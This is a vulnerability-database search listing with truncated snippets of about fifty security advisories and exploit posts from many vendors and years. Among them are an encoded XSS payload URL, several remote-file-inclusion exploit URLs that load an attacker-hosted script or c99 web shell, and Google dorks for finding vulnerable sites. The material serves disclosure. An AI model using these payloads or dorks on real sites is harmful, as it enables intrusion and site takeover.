47153 matches found
[security bulletin] HPSBMA02426 SSRT090053 rev.1 - HP System Management Homepage (SMH) for Linux and Windows Running PHP and OpenSSL, Remote Cross Site Scripting (XSS), Unauthorized Access
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01743291 Version: 1 HPSBMA02426 SSRT090053 rev.1 - HP System Management Homepage (SMH) for Linux and Windows Running PHP and OpenSSL, Remote Cross Site Scripting (XSS), Unauthorized Access NOTICE: Th...
dnsmasq multiple security vulnerabilities
DNS records spoofing, DoS...
CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit
Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2008-0002...
XSS in lighttpd
hey guys .. check out this new xss i just found ;P Vulnerable : lighttpd web : http://www.lighttpd.net XSS : http://127.0.0.1/path/search?q=223E3Cscript3Ealert2827bl4ck27293C2Fscript3E Discovered By BLacK ZeRo [email protected] Best regards ,,...
Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities
Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities Discovered By : ThELeO ; Software : Signkorn Guestbook v 1.3 ; Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2" Exploit : http://Www.Example.Com/Script/index.php?dirpath=U r Evil Script ;...
Comersus Cart Improper Request Handling
Comersus Cart Improper Request Handling Release Date: July 6, 2004 Severity: Medium Vendor: Comersus Open Technologies Software: Tested on Comersus Cart 5.09 Previous versions may also be affected. Remote: Remotely executed from any web browser Technical Details: The unethical user is able to...
MiniUPnP library buffer overflow
Buffer overflow on network request processing...
CSRF & XSS Wing FTP Server Admin <= v4.4.5
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: ============= 2015-04-28 Source: ==================================== http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt Common Vulnerability Scoring System: ==================================== Overal...
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Certificate check bypass, code execution, restrictions bypass, memory corruptions...
[ MDVSA-2014:004 ] nagios
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:004 http://www.mandriva.com/en/support/security/ Package : nagios Date : January 16, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 Problem Description: Multiple vulnerabilities have been discovere...
Omnistar Document Manager v8.0 - Multiple Vulnerabilities
Title: ====== Omnistar Document Manager v8.0 - Multiple Vulnerabilities Date: ===== 2012-10-03 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=712 VL-ID: ===== 712 Common Vulnerability Scoring System: ==================================== 8.3 Introduction: =============...
CVE-2012-4415: guacamole local root vulnerability
Overview ======== "Guacamole is an HTML5 web application that provides access to desktop environments using remote desktop protocols such as VNC or RDP. A centralized server acts as a tunnel and proxy, allowing access to multiple desktops through a web browser. No plugins are needed: the client...
Zones Web Solution (status.asp?print) (search_result.php?loc_id) Remote SQL injection Vulnerabilities
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerabilities Zones Web Solution status.asp?print search_result.php?loc_id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.zones.in/ Persian Gulf 4 Ever! Dork : "Powered by Zones Web...
SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress
SEC Consult Vulnerability Lab Security Advisory 20110701-0 ======================================================================= title: Multiple SQL Injection Vulnerabilities product: WordPress vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions fixed version: 3.1.4/3.2-RC3 impact:...
www.eVuln.com : SQL Injection in WikLink
www.eVuln.com advisory: SQL Injection in WikLink Summary: http://evuln.com/vulns/170/summary.html Details: http://evuln.com/vulns/170/description.html -----------Summary----------- eVuln ID: EV0170 Software: WikLink Vendor: n/a Version: 0.1.3 Critical Level: medium Type: SQL Injection Status:...
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability SecPod Technologies www.secpod.com Author Sooraj K.S SecPod ID: 1003 07/28/2010 Issue Discovered 07/30/2010 Vendor Notified No Response from Vendor Class: Cross-Site Scripting Severity: Medium Overview: --------- ZeusCar...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...
Mozilla Foundation Security Advisory 2009-23
Mozilla Foundation Security Advisory 2009-23 Title: Crash in nsTextFrame::ClearTextRun Impact: Critical Announced: April 27, 2009 Reporter: Marc Gueury, Daniel Veditz Products: Firefox Fixed in: Firefox 3.0.10 Description One of the security fixes in Firefox 3.0.9 introduced a regression that...
Elite Forum Full HTML ENject version 1.0.0.0
c0ded: St@rExT From : Turkey exploit: titleElite Forum FULL HTML ENjocter-By St@rEXT/title style bodybackground:urlhttp://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7uf0.jpg; color:FFFFFF; font-weight:bold; input background-color:darkred; color:FFFFFF; font-weight:bold; /style form...
CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability
ConTact Me:-wWw.Asb-May.Net ScRiPt:-http://callofduty.filefront.com/file/DreamStatsSystem;54520 Discovered By:- ThE dE@Th AsB-MaY DiScOvEr ExPlIoTs TeAm index.php:- if !$slots include$rootpath . 'html/serveroffline.php';exit; ExPlOiT:-http://www.Site.com/PaTh/index.php?rootpath=Shell milw0rm.com...
[SA16192] phpBook "admin" Cross-Site Scripting Vulnerability
---------------------------------------------------------------------- Are you interested in a new job in IT security? Secunia has two open positions as Junior and Senior Specialist in IT Security: http://secunia.com/secuniavacancies/...
[SYSS-2015-027] Cross-Site Scripting (CWE-79) in Page2Flip Premium App 2.5
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-027 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Cross-Site Scripting...
C4B XPhone UC Web 4.1.890S R1 - Cross Site Vulnerability
Title: ====== C4B XPhone UC Web 4.1.890S R1 - Cross Site Vulnerability Date: ===== 2012-04-24 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=484 VL-ID: ===== 484 Introduction: ============= XPhone Unified Communications 2011 is the most powerful telephony and...
ME Firewall Analyzer v7.2 - Cross Site Vulnerabilities
Title: ====== ME Firewall Analyzer v7.2 - Cross Site Vulnerabilities Date: ===== 2012-04-01 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=437 VL-ID: ===== 437 Introduction: ============= ManageEngine® Firewall Analyzer is a web based tool for change management,...
ZDI-11-190: Oracle Java ICC Profile 'crdi' Tag Parsing Remote Code Execution Vulnerability
ZDI-11-190: Oracle Java ICC Profile 'crdi' Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-190 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java Runtime --...
HTB22946: Multiple SQL Injection in Ajax Category Dropdown wordpress plugin
Vulnerability ID: HTB22946 Reference: http://www.htbridge.ch/advisory/multiplesqlinjectioninajaxcategorydropdownwordpressplugin.html Product: Ajax Category Dropdown wordpress plugin Vendor: http://www.dyasonhat.com/ http://www.dyasonhat.com/ Vulnerable Version: 0.1.5 Vendor Notification: 07 April...
[ MDVSA-2010:107 ] mysql
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2010:107 http://www.mandriva.com/security/ Package : mysql Date : May 25, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0, Enterprise Server 5.0 Problem Description: Multiple vulnerabilities have been...
Belkin BullDog Plus UPS-Service Buffer Overflow Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Who: Belkin International, Inc. http://www.belkin.com What: Belkin BullDog Plus UPS Management Software v4.0.2 Build 1219 UPS-Service.exe v1.0.0.1 dated 12/19/2006 How: The UPS management software contains a built-in web server which allows for remote...
ZeroShell <= 1.0beta11 Remote Code Execution
======================================================================== ZeroShell <= 1.0beta11 Remote Code Execution ======================================================================== Affected Software: ZeroShell <= 1.0beta11 Severity: High Local/Remote: Remote Author: Luca Carettoni -...
Exploit for the EZSA-2008-003 vulnerability
Exploit for the EZSA-2008-003 vulnerability. Description: The vulnerability is caused by insufficient validation when registering a new user via /user/register. Successful exploitation allows an attacker to obtain CMS administrator privileges. Affected are eZ Publish applications starting from...
mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability
mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability Class: Remote Vendor: http://www.mx-system.com/modules/mxpafiledb/dload.php?action=download&fileid=364 Founder: bd0rk Contact: bd0rkathackermail.com Vulnerable Code in /admin/adminalbumotf.php...
US-CERT Technical Cyber Security Alert TA04-111A -- Vulnerabilities in TCP
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Technical Cyber Security Alert TA04-111A archive Vulnerabilities in TCP Original release date: April 20, 2004 Last revised: -- Source: US-CERT Systems Affected Systems that rely on persistent TCP connections, for example routers supporting BGP Overvie...
Subscribe Me Vulnerability
Product: Subscribe Me Versions: ALL version numbers LITE only OS: Unix and Winnt Vendor: Notified, http://www.cgiscriptcenter.com/ The Problem: Yet again the script allows a remote user to overwrite the Admin Passwd file with any password they see fit. Therefore giving them Admin access to the...
Black Watch Labs Vulnerability Alert
Dear Security Professional, The following vulnerability: "Environment and Setup Variables Can Be Viewed Through DBMan db.cgi Script" is in the text of the message below and has just been posted to the Black Watch Labs Web site at http://www.perfectotech.com/blackwatchlabs/ Thank you, Black Watch...
Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities
Over 150 vulnerabilities in different applications are closed in the quarterly update...
SEC Consult SA-20141218-2 :: Multiple high risk vulnerabilities in NetIQ Access Manager
SEC Consult Vulnerability Lab Security Advisory 20141218-2 ======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP1 Hot Fix 3 CVE number: CVE-2014-5214,...
[SECURITY] [DSA 3075-1] drupal7 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3075-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso November 20, 2014 http://www.debian.org/security/faq -...
FreeBSD Security Advisory FreeBSD-SA-14:06.openssl [REVISED]
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:06.openssl Security Advisory The FreeBSD Project Topic: OpenSSL multiple vulnerabilities Category: contrib Module: openssl Announced: 2014-04-08 Affects: All...
[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04239372 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04239372 Version: 1 HPSBMU02998 rev....
zFtp Server <= 2011-04-13 | "STAT,CWD" Remote Denial of Service Vulnerability
zFtp Server <= 2011-04-13 | "STAT,CWD" Remote Denial of Service Vulnerability 1. OVERVIEW The zFTP server is found to be vulnerable to denial of service in handling multiple STAT and CWD command requests. 2. BACKGROUND The zFTP server is a Windows based FTP server with focus on clever Active...
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-09-08 December 9, 2009 -- CVE ID: CVE-2009-3846 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView Network Node Manager --...
ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability
ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-085 November 20, 2009 -- CVE ID: CVE-2009-3843 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView Operations...
[CVE-2008-1232] Apache Tomcat XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-1232: Apache Tomcat XSS vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.37 Tomcat 5.5.0 to 5.5.26 Tomcat 6.0.0 to 6.0.16 The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be als...
ALL VERSION PHPAUTOVIDEO c99 shell
ALL VERSION PHPAUTOVIDEO AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "powered by phpAutoVideo" DORKS 2 : Copyright © 2007 Agares Media DORKS 3 : allinurl: "playvideo.php?video" EXPLOIT : wwww.xxxxxx.com/admin/frontpageright.php?loadadminpage=http:xxxxx.c99.txt? S@BUN...
[Full-disclosure] Utopia News Pro version 1.4.0 XSS Attack Vulnerability
netVigilance Security Advisory 34 Utopia News Pro version 1.4.0 XSS Attack Vulnerability Description: Utopia News Pro is a powerful and scalable news management system for any web site. News Pro, written in PHP and backed by the renowned MySQL database system, Utopia Software's News Pro is an ide...
PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities
Dj7xpl +Iranian Are The Best In World+ Portal.......: PcP-Book 3.0 Site.........: http://www.pcp-system.at Down.........: http://www.ectona.org/download/?id=621&...
Yahoo! Messenger Auth Bypass Vulnerability
This advisory is being provided to you under the policy documented at http://www.wiretrip.net/rfp/policy.html. You are encouraged to read this policy; however, in the interim, you have approximately 5 days to respond to this initial email. This policy encourages open communication, and I look...
Insecure input validation in YaBB Search.pl
Hi Everybody, Kosak reported this problem to vuln-dev last night. I downloaded the script and did some testing. There is an input validation problem with the 'catsearch' field, which gets interpolated in an open statement: openFILE, "$boardsdir/$cattosearch" || &fatalerror"$txt'23'...
Security Advisory: Hassan Consulting's shop.cgi Directory Traversal Vulnerability.
October 7, 2000 Security Advisory shop.cgi.ad-1.00-10 : Hassan Consulting's Shopping Cart shop.cgi Directory Traversal Vulnerability Affected Product: Hassan Consulting's Shopping Cart shop.cgi/shop.pl Version 1.18, possibly others as well Affected Platforms: Unix, Windows Overview: Hassan...
SYSS-2015-033: Missing Function Level Access Control (CWE-935) in Page2Flip Premium App 2.5
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-033 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Missing Function Leve...